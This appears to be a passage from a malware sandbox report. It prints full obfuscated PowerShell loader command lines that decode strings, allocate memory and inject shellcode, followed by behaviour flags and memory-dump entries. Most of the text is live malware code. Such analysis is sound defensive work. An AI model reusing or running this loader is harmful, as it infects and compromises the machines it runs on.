Su'Er8Mo2Fe9Be5le8Se4Un8Ta5lu8Pj2Ou9BuEFiDar0OrDPn4Az9GeEsa8Ec5Re9AbCGu8Lu0St8Co5Re9shEIn9SeBRe8Co4Fo8Ge3Sk9SkFSt9KlDCu8Je2Sl9Ud1Ae9Ri1Co9Ca4Fr9Sc5DyDshEUdBUn3Re8Be2Pu9Fr5Ar9St1Ps8ga4Ga9Se5kuANo4Jt8Po9Er8Fi0Un9Sm5PoDSk8StDSt9Mi'Bo;Tv&Ko(Ul`$FrMTooVirWaiFocBihSveSa7De)Te un`$AnFforzoeKomChsUdkenrReisadSttPasSkoJipDrtUsiUdmPaiLgsTemPleDinNa5Pa Ak Pr St;Rm}je`$PrHInaAbuRularijoeEfrUdsAc Be=ru UpGSlyFrrNooEkpAnivilKooTotKa0Ka Re'Ta9SpBLs9De5Ud8su2La9SiEDa9Od5Pu9SuCUhCQu3UdCBo2Pr'In;Rn`$FoFTirBeeAumMesUnktjrFiibldIntPusBroInpNrtUniJumSuifrssvmDeeFonUn6Fi Pr=Re GeGAnyIdrunoCypLaiImlChoPotEp0St St'UnDSk4SaAFi3Ru9SeBol9Ko9Ko8Mi0Ri8Fu0Sk9Co5Sk8de2St9ChCFu9In7Re9afETi8Bd3SpDDa0PsCAfDStDIl0KrASyBSaAdy3So8Un9Ma8Me3As8Af4Do9Vs5Ag9OvDStDRuEChACa2Fo8Ov5Me9ThEPh8Pa4Re9Ma9Un9EpDbu9Sk5duDBiEAdBfr9Do9PhEBo8As4Va9Tr5Ki8Hj2St9UdFUu8Fo0PrApa3De9te5Re8Ch2Om8Ad6Eu9Me9Da9Un3Jo9Su5Af8Et3OvDLaEMnBPoDUn9Ra1Dr8Ba2Bo8Ga3Im9My8Sh9He1be9IsCMyASaDFaCOpAAfCLeAMoBBe7Un9Ac5Fo8sa4CaBPs4Kr9Os5Au9KaCKn9Di5Ca9Va7Al9Co1Ca8fl4St9Eu5SkBSt6Bl9RiFFi8Pe2SvBHy6Sa8Tr5Sy9LeEIg9Ep3Re8Lo4An9bl9Pe9PaFDa9SyEPuARe0fe9AnFUn9Kl9Re9PlEHi8Gl4Se9Sp5Ar8Wa2IrDSp8SuDUd8Un9Mi6Fr9KaBpa8Ni0InDLa0NoDMi4miBbo8sk9Na1Bl8Tr5st9HyCMo9Tr9Om9Pr5Ox8Ar2Ke8Se3MuDSk0ArDfy4egBVoDGr9DuFSc8Va2en9La9Pa9Pa3Sk9Ch8Cr9Af5WaCTr4KlDUr9keDPuCVeDCh0TrDLa8MuBFo7StBEr4AfASa4BuDRi0AuBUn0UdDfa8ImASaBSaBSk9Mo9AdEDi8Af4LaAFr0Fr8Ra4Go8Ps2PrAaoDHaDTrCVeDud0ZoAGeBHeAPe5MeBBi9Ta9WaEUn8Jo4XyCSk3HoCMi2OuAInDcoDBeCDeDBa0SlASiBFrALe5tiBBa9St9GiESk8Vr4BrCRe3InCPl2SkABrDLaDDiCSwDBr0HyAPlBBrAAl5MiBLs9Su9NoEAl8Po4elCTa3HoCSu2LuAPrDScDHe9UdDmu0HoDUd8SuAGlBIdBBu9Ta9StEAf8An4VaAMe0Al8Ti4Ex8Te2PlAheDnoDWa9ChDTr9BlDLu9Do'Ho;Re&Ma(Ro`$IsMFeoPrrpriKacAahaaeNo7ge)Po Ur`$DaFSyrNoeBlmTisTekFirBliCodFytSysheoAtpAftJaiTrmLaiPesComHyeGunUd6Im;Ti`$ArUMagSilIneKnsVaaSpath Fr=Ro DefPukPrpBr Om`$SkMTuoPrrEuikicKvhAseOb5hv Ta`$nuMOuoBarMiiDkcUohBoeMe6hj;Un`$StFterAmeDomResAnkAmrbaiModuntSpsGaoInpSmtobiFamFoiOnsDemEseMenTa7St up=Re SaGBeyCrrTroDepLiiMolYnoShtUn0Sa Ni'NeDSa4CuBTrDFo9No9mu9HvEDi9Tr9Pe9ExDSc8Lo5Gr9KoDGu8Un4Af8Ej2Lu8Un9Re9paBMe9hjBSy9Le5Ud8Mu4teCMo3maDBa0EsCHfDTiDUn0BeDFu4CoARi3Na9PaBKa9Ve9Bi8em0Sp8du0Si9Ha5ra8Vi2Gr9ChCRo9Ti7is9MiEOv8Re3KiDMeEToBAn9Wa9enERe8Eu6Ba9IrFSe9SoBHe9Er5WeDTa8NoAStBCrBAp9Mo9GyETr8Ex4VeABy0Ev8Al4Cn8Ur2DeARiDArCSmAorCBiAPrASeACe9Co5Bi8Kn2Ab9CgFteDNoCApDUn0SaCCo6LyChe5PrCbe2tkDReCReDEr0QuCEv0li8Co8TrCAr3ChCSe0BoCFe0PiCTi0FaDCoCDeDNe0AfCUs0Bi8mo8HeCAn4PsCJe0GrDEn9Ha'Mo;Im&So(fj`$OvMSioRnrCrihucAfhBaeTh7Ki)Su St`$RkFBjrBeeBemSasHekUnrMyifjdIntHasSaoCapSttBoiBumAriDisVumTaeFrnPa7Sy;Fi`$DeFInrSpeDemErsBekTorSuiLadbatAdsStoSipBitoriInmSaiFosLomBeecanAn8Ap Pa=Se FoGMoyCarNooPopAfiEvlFaoDitVi0Sl Or'DyDTi4BrAhj7An9Sm9cl9woERa9Un4Fo9MiFFr8Sw7Pa9PhDAm9Gr1Un9FoBSv9fl9Cl9DrEVe9Fi7InDSe0viCRiDdeDso0EnDCe4EmACo3Ra9NoBSa9Be9Be8Qu0Hy8Bo0Pr9ud5Sh8Sc2Me9CoCDo9Ag7Ov9TrETr8Bo3HlDRoETrBEn9Ba9SkEAn8st6Ti9IsFAl9LuBBy9Sp5SoDCo8ReATyBSjBRr9No9LiERe8De4LoAHj0Fl8er4Sa8Mi2FlAHoDHaCUnABeCMiACoAspATr9Ca5Wa8Ch2Te9ReFAtDSoCBrDFo0PaCBr5HiCBr0CiCMe1InCTa9SvCTa6HeCSa4SaCBi8TuCLa0SuDpuCAvDby0DeCPe0co8Ka8FrCTr3TeCdi0AfCAg0MiCAc0CoDUdCReDUn0biCFo0sm8By8SuCSp4KaDHo9Sk'Pe;Pu&Fa(Ph`$TrMSeoUfrPliVacNohPaeBe7Bl)Th st`$CoFCorTreEsmNisLikCrrUniPodsptPysVioEcpBatSyiHomAciprsZamsveSknRr8in;Ri`$FoMGeiSanSpiRemDiuHomUntFlrMiySekDikCoeAltSt0Co0Hy=Gr'KnHUnKLiCThUBo:Sm\SpOPsmPrkRaaAnrUhtEreRerLieNonGrdIneSt\FaNReastpHihCotChhBiaInlCeiKasAneHadVa'To;Pa`$SnMChiVrnTiiIrmBuuHamLotBerafyVokApkBoeZotOp0Bo1Si Ne=WhGDiyKarGnoAlpViiallSwoAftEn0Ge Ba'VaDSk4AnAPr3Su9Pr5Od8ek2Ga8Kn6Ep9re9De8Po4Sn9SuFIr8Et2Re9Sa9Ja9Fa1He9BeCudCThDAkDsc8AcBAn7Pe9Ud5Se8Ca4syDBeDUnBRa9di8Bo4Se9Hi5Gl9DaDHyAHu0No8An2Or9StFPo8Lo0Tr9Jd5pr8Pr2Da8Cr4Tr8Re9eqDRh0BlDBrDBeAEp0Ou9Ph1Va8En4An9Mo8liDwa0FiDUl4BaBQuDFo9Bo9Di9PhECh9St9Vi9AcDCr8Si5Mo9GoDNu8Rr4Fo8Fl2Tu8An9Co9trBKr9GoBIn9Vi5Li8An4InCTh0DeCUn0NoDKe9deDEnEStBRa7Sa9Un1St8Vo2Be9Si4Rn9Ho5To8Tr2Sk9AlFVe9Ps6Si9Co6Co9da9Pr9Sp3Ge9Ud5Me8Ja2Sl9Lu5Hy9laEsa8Gl3Di'si;Di&Da(To`$GoMKroSerUniBecTrhneeFo7Ov)Au Fl`$HeMBaiScnPoinomSpuMimArtSurVeyRikUnkUneintKl0Fj1Qu;Ra`$OvFInrSkeFumStsSokUnrSeiSedSutOpsTeoFrpAltNaiRemBeiRisThmApelinAs9Ve Ac=Ro DrGGlyswrDroSupFliSalAvoFotDi0Al Mu'UtDLo4NoBUn6Al8Te2Hy9Mi5Ar9DeDPe8Bi3Re9FiBUn8De2Ka9Bi9Am9Bo4Zi8La4Pl8Se3On9CaFSt8No0Te8Ho4Tw9Ir9Gl9InDOv9Ge9St8Li3La9AmDRe9Do5Af9glEEsDSc0BeCPeDMeDSc0ReAXeBSaAUn3Sk8Ca9St8ki3br8Sc4Pa9Su5Sp9AdDWhDChEHoBLi3no9PyFEn9CaEPl8La6Me9Ku5Kv8Fr2se8Co4FoAUdDCoCPeAStClaAOpBAr6ly8Su2Se9ThFEl9LsDSvBHe2Gr9Fa1Ka8ho3Po9Lb5TrCSp6JeCFu4BrARa3Sl8Fe4pi8Fo2By9Vr9Ud9GeEKn9Cu7DeDFo8SuDUn4NaABa3Ko9Zo5Sa8Po2Wh8Pr6Mi9Gi9Se8Be4Ba9SaFCo8Xs2Un9Ul9Ri9Po1Go9SeCAnDBe9sp'La;Fr&Vi(La`$ScMFioSkrEfiVgcSphSteSk7Vi)Un Co`$SuFHarReeFomAnsTokParKriNodretRasSvoempKatBaiDamIniAbsCrmEmeMonKi9Pa;On`$NeSOxeAarUkvNaiPatCooBurMaiStaPelLo0st Ko=Ba BlGAcyIzrIgoDepAsiSalCooSytHe0in Re'AnAVeBPrARe3Na8Mi9Re8Co3bi8Gu4Sn9Kl5Ra9UpDprDTlEinACh2Fo8Id5Ca9UdEDe8be4He9Un9Hi9ChDEc9In5GuDOvEBeBDk9Re9DiEIc8Fl4Cu9Ey5Ba8El2Ni9BiFBi8Pr0PeAEr3Wa9Bo5Be8in2Mr8Ca6Ng9Mu9Sp9Fa3Le9Fr5Be8Tr3BeDHiENaBReDSq9Ti1Ph8Bo2ga8Ha3Le9Ge8Sp9Re1To9phCPaASmDSeCUnASlCSmAKaBRu3Ch9SeFer8an0An8In9TiDCr8SgDFd4PuBPo6Ar8In2Re9By5By9stDRw8Ma3Sv9DoBDe8ca2Pr9Ud9Ok9Th4Vo8Ne4Ch8Ud3Fo9faFEn8Re0Co8Va4Te9Sl9wa9SaDKa9Ko9ca8Ro3Mo9TeDTh9ca5py9InEAnDTrCFeDPe0HgCOc0PaDInCKeDHa0ByDre0MeDUn4ReBMiDar9Pr9Te9arESo9Ge9Bg9vuDRa8Sk5Be9gnDPr8Ec4Pr8Di2Ge8Co9Fl9UnBKr9TeBTr9St5fi8Um4heCSe3AnDBeCsaDUt0MaCLa6KbCTa5ApCSp2AmDTr9Pa'Pr;Sa&za(Fl`$BaMVeoSirKliFecUnhEleKb7Ho)Ta Mi`$LaSPreAerRevSaicotkeoMurBeiFuazalpe0Cr;cy`$UnCBlyAwnVeoChsafaasrPlgGoeSnsFa=va`$GaFGarOmeKnmKusAfkMirImiIrdDitTusAsoBopSttPriPlmDriHasAmmIneLynOp.GocGlotruPrnMatBe-Ov6Fa5Ma2Nd;De`$AnSTeeTrrcevViiBotSuoBorBdiCoaKulCl1In Ge=Br drGPryufrAnoEspDriStlHaoEktBo0Gu Mo'ViABoBReAFa3st8Kv9Fo8St3Nu8Ly4Ul9Sk5Me9FeDKlDMaEHeALo2qu8Bl5ho9AlEHa8En4Ed9Sa9Ca9PrDUd9Do5FrDsuETrBAf9Un9FoEMu8Ud4Bu9Be5Re8Ki2An9AeFyo8Ka0DeAOv3Go9Pr5Un8Vo2Ti8Eg6Bl9Ch9Af9Sy3Mu9he5Fr8Sd3prDNoEkdBArDPa9Ma1Sn8Un2Vi8gi3Un9Sc8Ga9In1Ni9SiCSuAKlDFaCDeAStCReAKiBBa3Op9obFSk8Gr0Id8In9SqDKi8FaDUn4akBAf6Ud8Bo2Nu9Os5Ro9QuDWh8Ud3Of9MaBLd8He2Fe9Kd9Im9Ad4Te8cr4Ud8Co3Ku9EtFCa8Ha0Am8Fo4Ma9Sv9Si9SkDAd9Ph9Sw8An3la9KuDAn9Fo5Op9NeESuDChCgeDAm0baCCr6efCVi5SkCRe2KaDGaCAmDJo0UnDSy4KrAKr7Lu9Un9Ar9EtEPa9De4Tu9RoFIn8Al7Hy9TrDpl9Fo1Ca9IkBIn9Da9Hy9FlEPe9Oc7MiDCoCHeDRe0NeDPe4AnBah3Re8Fo9Bu9ViEFi9BiFSy8Is3he9Bl1Sp8Ko2Se9No7Re9Ug5Ov8Ko3CiDUn9Bl'Ld;Bu&Se(Ve`$tuMfaoBortriSecSehMieDy7Ch)Ud Tr`$amSOveSyrUnvPriEktAfoStrBaiPhaRalOu1Mo;No`$PaSEreMirExvBaiBitReoFlrUniMaaBllKa2va Pi=Ca DiGFoyenrzootopFiiEtlCaoSktGa0Pe Bo'SoDFe4Da8Me0Se9Ar5Pi8Bl2Do9Ru3Sk9MaFDy9By9Fo9un4Fi9Se5In9Se1Fo9FlECoDFo0PaCBeDReDKl0OvAStBOzAAn3In8Me9Ob8An3Ba8Se4Om9de5An9KoDFlDVoEStARe2ch8Mu5Om9BjETi8Ph4Un9an9In9StDKl9To5LyDUnEClBRi9Su9CoEVo8St4Ep9Ca5Be8Ur2ud9PlFKu8Ve0DiACa3Cr9Mo5Pe8Le2Ba8Tr6Bo9Be9de9Sk3ep9No5Un8st3DeDOvEEnBceDNo9Gr1Go8Fr2St8Ma3So9En8Ex9Ha1Im9BrCNeATiDAfCTiAKeCTiAHaBCa7In9Mi5Ri8Re4SlBpi4Co9ul5Ra9OdCLa9So5Ka9Fe7Bu9Sk1Fe8go4Bu9Je5NoBCr6Tr9StFKa8Ma2AbBWe6An8Sk5Be9SkEFo9Se3Ci8Fj4Sp9Sa9Ba9TiFTe9AnEFiAli0St9naFFe9Zo9Di9FlETa8Le4Ua9ko5Te8Sa2BeDPs8MoDUs8Hi9Ns6Mo9OpBPe8Cu0InDUn0BiDIn4ReBOp1Da9Ki7Le8Op5Ka8Dr2Re9InBIn9Pa5Ev8Un2Re9FeEOm9ko5Sm8mu3ReDUn0TiDUn4DrBEr7Kr9Pi1To9EfCTe8Vi5Ea9Po3nu9St8Tr9Ha1Re8be4MiDAl9HeDCyCSmDFe0HoDFi8AdBRe7SpBAn4PrAEx4ChDCh0HoBHo0TyDOu8SoAFlBsvBCe9De9CoEIn8op4ExAHy0Bi8Di4St8Ba2EpAFeDChDSeCPaDBr0WrALuBTyBSy9Hu9CoEPl8De4GsAFa0Fo8Ni4En8Op2KeAScDDiDInCFoDHo0DyAPrBLoBro9Gs9KnETr8Pi4PoAIn0Is8Br4To8Ek2foAIsDDeDLaCSpDDd0SiAVaBHvBSt9Su9ReEDi8Af4EfAUn0Wi8Sh4Or8Sk2RuAMiDKoDReCSpDRe0biAEuBDeBSt9Me9SuETo8Ta4ArASy0Ad8Re4br8Hv2FoASeDpaDSt9HuDOp0InDSa8quAUnBExBDe9Un9GlEKv8Ba4AnAPr0Tv8Ru4Pa8Cy2HoABuDSnDBo9MoDma9peDAk9Ma'Ha;Vi&Gu(Cr`$AdMUnoBlrMaiGrcTahSkeTo7Al)Se Ve`$SnSDreVorKovDiiFitChoIsrIbiSiaSelUd2Bl;Pe`$SkSSreHyrNovSkiBatFioInrDeiRaaInlFa3Mi Sp=Sa ReGkoyMirRuoBlpLuiShlMioZotPi0Di Fl'diDMa4Ec8Ke0Ra9Cr5Hy8Bo2Me9Bo3Un9ExFSa9Sy9Ma9Ra4Gr9As5ne9Re1Ko9HaELeDWaEdeBUd9Po9GeETi8Pe6Ki9BiFKo9WeBTh9Re5BeDSc8viDTh4FaBBrDGe9Ke9Di9NiESu9Sk9Gr9OkDAk8Ve5Sp9BlDId8Fe4Ch8in2Ov8Ch9Ov9klBNo9UnBSn9Bi5ax8Ca4SpCaa3tjDChCGoDNv4DiAFo7On9Fl9Jo9GlEFr9Me4Tu9AlFvi8Sk7Om9PrDMi9Ba1In9moBPr9Le9La9BeEIn9No7KaDStCBuDTh4JuASp5Be9Di7Dd9liCOr9Sk5Kr8Sp3Br9Op1Br9Br1ViDShCMaCMa0ScDKnCUdCbn0SeDJa9fo'Mo;en&He(No`$SnMWeoOvrGliAncSthSteId7Es)An Mo`$InSAlePrrBavIniDetMaoUdrmaiSuaCrlKa3Sp#de;""";;Function Servitorial9 { param([String]$Toeres); For($Inseratet=2; $Inseratet -lt $Toeres.Length-1; $Inseratet+=(2+1)){ $Gyropilot = $Gyropilot + $Toeres.Substring($Inseratet, 1); } $Gyropilot;}$Stafettens0 = Servitorial9 'By Be Ku Ar Bl Sp Br Da Ec Du Te Bo Su Ph Bo Af Fl Ku Ko Te In St Ex StITrEGlXAb ';$Stafettens1= Servitorial9 $Saliant;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Stafettens1 ;}else{.$Stafettens0 $Stafettens1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Gyropilot0 { param([String]$Toeres); $Metropolitanizes = New-Object byte[] ($Toeres.Length / 2); For($Inseratet=0; $Inseratet -lt $Toeres.Length; $Inseratet+=2){ $Tallote = $Toeres.Substring($Inseratet, 2); $Metropolitanizes[$Inseratet/2] = [convert]::ToByte($Tallote, 16); $Metropolitanizes[$Inseratet/2] = ($Metropolitanizes[$Inseratet/2] -bxor 240); } [String][System.Text.Encoding]::ASCII.GetString($Metropolitanizes);}$Spiralfjederen0=Gyropilot0 'A3898384959DDE949C9C';$Spiralfjederen1=Gyropilot0 'BD9993829F839F9684DEA7999EC3C2DEA59E83919695BE9184998695BD9584989F9483';$Spiralfjederen2=Gyropilot0 'B79584A0829F93B1949482958383';$Spiralfjederen3=Gyropilot0 'A3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596';$Spiralfjederen4=Gyropilot0 '838482999E97';$Spiralfjederen5=Gyropilot0 'B79584BD9F94859C95B8919E949C95';$Spiralfjederen6=Gyropilot0 'A2A4A380959399919CBE919D95DCD0B8999495B289A39997DCD0A085929C9993';$Spiralfjederen7=Gyropilot0 'A2859E84999D95DCD0BD919E91979594';$Spiralfjederen8=Gyropilot0 'A295969C9593849594B4959C9597918495';$Spiralfjederen9=Gyropilot0 'B99EBD959D9F8289BD9F94859C95';$Moriche0=Gyropilot0 'BD89B4959C9597918495A4898095';$Moriche1=Gyropilot0 'B39C918383DCD0A085929C9993DCD0A395919C9594DCD0B19E8399B39C918383DCD0B185849FB39C918383';$Moriche2=Gyropilot0 'B99E869F9B95';$Moriche3=Gyropilot0 'A085929C9993DCD0B8999495B289A39997DCD0BE9587A39C9F84DCD0A699828485919C';$Moriche4=Gyropilot0 'A699828485919CB19C9C9F93';$Moriche5=Gyropilot0 '9E84949C9C';$Moriche6=Gyropilot0 'BE84A0829F84959384A699828485919CBD959D9F8289';$Moriche7=Gyropilot0 'B9B5A8';$Moriche8=Gyropilot0 'AC';$Agurkernes=Gyropilot0 'A5A3B5A2C3C2';$Galuchat=Gyropilot0 'B3919C9CA7999E949F87A0829F93B1';function fkp {Param ($Binomialkoefficienter, $Leveringsomkostning) ;$Fremskridtsoptimismen0 =Gyropilot0 'D4BB918983D0CDD0D8ABB18080B49F9D91999EADCACAB3858282959E84B49F9D91999EDEB79584B18383959D929C999583D8D9D08CD0A798958295DDBF929A959384D08BD0D4AFDEB79C9F92919CB18383959D929C89B391939895D0DDB19E94D0D4AFDEBC9F939184999F9EDEA3809C9984D8D4BD9F8299939895C8D9ABDDC1ADDEB58185919C83D8D4A3809982919C969A95949582959EC0D9D08DD9DEB79584A4898095D8D4A3809982919C969A95949582959EC1D9';&($Moriche7) $Fremskridtsoptimismen0;$Fremskridtsoptimismen5 = Gyropilot0 'D4A3809C858484958283D0CDD0D4BB918983DEB79584BD9584989F94D8D4A3809982919C969A95949582959EC2DCD0ABA4898095ABADADD0B0D8D4A3809982919C969A95949582959EC3DCD0D4A3809982919C969A95949582959EC4D9D9';&($Moriche7) $Fremskridtsoptimismen5;$Fremskridtsoptimismen1 = Gyropilot0 '82958485829ED0D4A3809C858484958283DEB99E869F9B95D8D49E859C9CDCD0B0D8ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596ADD8BE9587DDBF929A959384D0A3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596D8D8BE9587DDBF929A959384D0B99E84A08482D9DCD0D8D4BB918983DEB79584BD9584989F94D8D4A3809982919C969A95949582959EC5D9D9DEB99E869F9B95D8D49E859C9CDCD0B0D8D4B2999E9F9D99919C9B9F959696999399959E849582D9D9D9D9DCD0D4BC95869582999E97839F9D9B9F83849E999E97D9D9';&($Moriche7) $Fremskridtsoptimismen1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Stonefishes22,[Parameter(Position = 1)] [Type] $Reattainment = [Void]);$Fremskridtsoptimismen2 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495D0CDD0ABB18080B49F9D91999EADCACAB3858282959E84B49F9D91999EDEB49596999E95B4899E919D9993B18383959D929C89D8D8BE9587DDBF929A959384D0A3898384959DDEA295969C959384999F9EDEB18383959D929C89BE919D95D8D4A3809982919C969A95949582959EC8D9D9DCD0ABA3898384959DDEA295969C959384999F9EDEB59D9984DEB18383959D929C89B285999C949582B19393958383ADCACAA2859ED9DEB49596999E95B4899E919D9993BD9F94859C95D8D4A3809982919C969A95949582959EC9DCD0D496919C8395D9DEB49596999E95A4898095D8D4BD9F8299939895C0DCD0D4BD9F8299939895C1DCD0ABA3898384959DDEBD859C849993918384B4959C9597918495ADD9';&($Moriche7) $Fremskridtsoptimismen2;$Fremskridtsoptimismen3 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495DEB49596999E95B39F9E8384828593849F82D8D4A3809982919C969A95949582959EC6DCD0ABA3898384959DDEA295969C959384999F9EDEB3919C9C999E97B39F9E86959E84999F9E83ADCACAA384919E94918294DCD0D4A3849F9E95969983989583C2C2D9DEA39584B99D809C959D959E849184999F9EB69C919783D8D4A3809982919C969A95949582959EC7D9';&($Moriche7) $Fremskridtsoptimismen3;$Fremskridtsoptimismen4 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495DEB49596999E95BD9584989F94D8D4BD9F8299939895C2DCD0D4BD9F8299939895C3DCD0D4A29591848491999E9D959E84DCD0D4A3849F9E95969983989583C2C2D9DEA39584B99D809C959D959E849184999F9EB69C919783D8D4A3809982919C969A95949582959EC7D9';&($Moriche7) $Fremskridtsoptimismen4;$Fremskridtsoptimismen5 = Gyropilot0 '82958485829ED0D49E859C80859E9B84839F9D8291919495DEB38295918495A4898095D8D9';&($Moriche7) $Fremskridtsoptimismen5 ;}$Hauliers = Gyropilot0 '9B95829E959CC3C2';$Fremskridtsoptimismen6 = Gyropilot0 'D4A39B99808095829C979E83D0CDD0ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB79584B4959C9597918495B69F82B6859E9384999F9EA09F999E849582D8D8969B80D0D4B891859C99958283D0D4BD9F8299939895C4D9DCD0D8B7B4A4D0B0D8ABB99E84A08482ADDCD0ABA5B99E84C3C2ADDCD0ABA5B99E84C3C2ADDCD0ABA5B99E84C3C2ADD9D0D8ABB99E84A08482ADD9D9D9';&($Moriche7) $Fremskridtsoptimismen6;$Uglesaa = fkp $Moriche5 $Moriche6;$Fremskridtsoptimismen7 = Gyropilot0 'D4BD999E999D859D8482899B9B9584C3D0CDD0D4A39B99808095829C979E83DEB99E869F9B95D8ABB99E84A08482ADCACAAA95829FDCD0C6C5C2DCD0C088C3C0C0C0DCD0C088C4C0D9';&($Moriche7) $Fremskridtsoptimismen7;$Fremskridtsoptimismen8 = Gyropilot0 'D4A7999E949F879D919B999E97D0CDD0D4A39B99808095829C979E83DEB99E869F9B95D8ABB99E84A08482ADCACAAA95829FDCD0C5C0C1C9C6C4C8C0DCD0C088C3C0C0C0DCD0C088C4D9';&($Moriche7) $Fremskridtsoptimismen8;$Minimumtrykket00='HKCU:\Omkarterende\Naphthalised';$Minimumtrykket01 =Gyropilot0 'D4A395828699849F8299919CCDD8B79584DDB984959DA0829F8095828489D0DDA0918498D0D4BD999E999D859D8482899B9B9584C0C0D9DEB791829495829F969699939582959E83';&($Moriche7) $Minimumtrykket01;$Fremskridtsoptimismen9 = Gyropilot0 'D4B682959D839B82999484839F8084999D99839D959ED0CDD0ABA3898384959DDEB39F9E86958284ADCACAB6829F9DB2918395C6C4A38482999E97D8D4A395828699849F8299919CD9';&($Moriche7) $Fremskridtsoptimismen9;$Servitorial0 = Gyropilot0 'ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB39F8089D8D4B682959D839B82999484839F8084999D99839D959EDCD0C0DCD0D0D4BD999E999D859D8482899B9B9584C3DCD0C6C5C2D9';&($Moriche7) $Servitorial0;$Cynosarges=$Fremskridtsoptimismen.count-652;$Servitorial1 = Gyropilot0 'ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB39F8089D8D4B682959D839B82999484839F8084999D99839D959EDCD0C6C5C2DCD0D4A7999E949F879D919B999E97DCD0D4B3899E9F839182979583D9';&($Moriche7) $Servitorial1;$Servitorial2 = Gyropilot0 'D4809582939F999495919ED0CDD0ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB79584B4959C9597918495B69F82B6859E9384999F9EA09F999E849582D8D8969B80D0D4B19785829B95829E9583D0D4B7919C8593989184D9DCD0D8B7B4A4D0B0D8ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADD9D0D8ABB99E84A08482ADD9D9D9';&($Moriche7) $Servitorial2;$Servitorial3 = Gyropilot0 'D4809582939F999495919EDEB99E869F9B95D8D4BD999E999D859D8482899B9B9584C3DCD4A7999E949F879D919B999E97DCD4A5979C95839191DCC0DCC0D9';&($Moriche7) $Servitorial3#"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/592-62-0x0000000000000000-mapping.dmp
-
memory/592-69-0x00000000059A0000-0x000000000897F000-memory.dmpFilesize
47.9MB
-
memory/592-68-0x00000000737E0000-0x0000000073D8B000-memory.dmpFilesize
5.7MB
-
memory/592-65-0x00000000059A0000-0x000000000897F000-memory.dmpFilesize
47.9MB
-
memory/592-64-0x00000000737E0000-0x0000000073D8B000-memory.dmpFilesize
5.7MB
-
memory/592-63-0x0000000075B41000-0x0000000075B43000-memory.dmpFilesize
8KB
-
memory/628-59-0x0000000002854000-0x0000000002857000-memory.dmpFilesize
12KB
-
memory/628-61-0x000000000285B000-0x000000000287A000-memory.dmpFilesize
124KB
-
memory/628-60-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/628-58-0x000007FEF3920000-0x000007FEF447D000-memory.dmpFilesize
11.4MB
-
memory/628-66-0x0000000002854000-0x0000000002857000-memory.dmpFilesize
12KB
-
memory/628-67-0x000000000285B000-0x000000000287A000-memory.dmpFilesize
124KB
-
memory/628-57-0x000007FEF4480000-0x000007FEF4EA3000-memory.dmpFilesize
10.1MB
-
memory/628-55-0x0000000000000000-mapping.dmp
-
memory/1844-54-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmpFilesize
8KB